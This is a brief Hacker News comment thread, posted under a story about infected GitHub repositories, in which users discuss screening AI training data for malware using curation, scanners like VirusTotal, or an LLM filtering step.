Datasets will probably move toward a curated datasets instead of scraping everyt... | Hacker News

Hacker News new | past | comments | ask | show | jobs | submit

login

zitterbewegung 10 months ago | parent | context | favorite | on: Over 100k Infected Repos Found on GitHub

Datasets will probably move toward a curated datasets instead of scraping everything from the Internet. Also you could add a tool that would have the purpose of identifying malware and reject the output like using virustotal

thriftwy 10 months ago [–]

Why not just ask LLM whether it thinks the snippet is kooky, before adding it into LLM training set?

You don't need tools in the age of AI, just ass an AI pipeline step.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact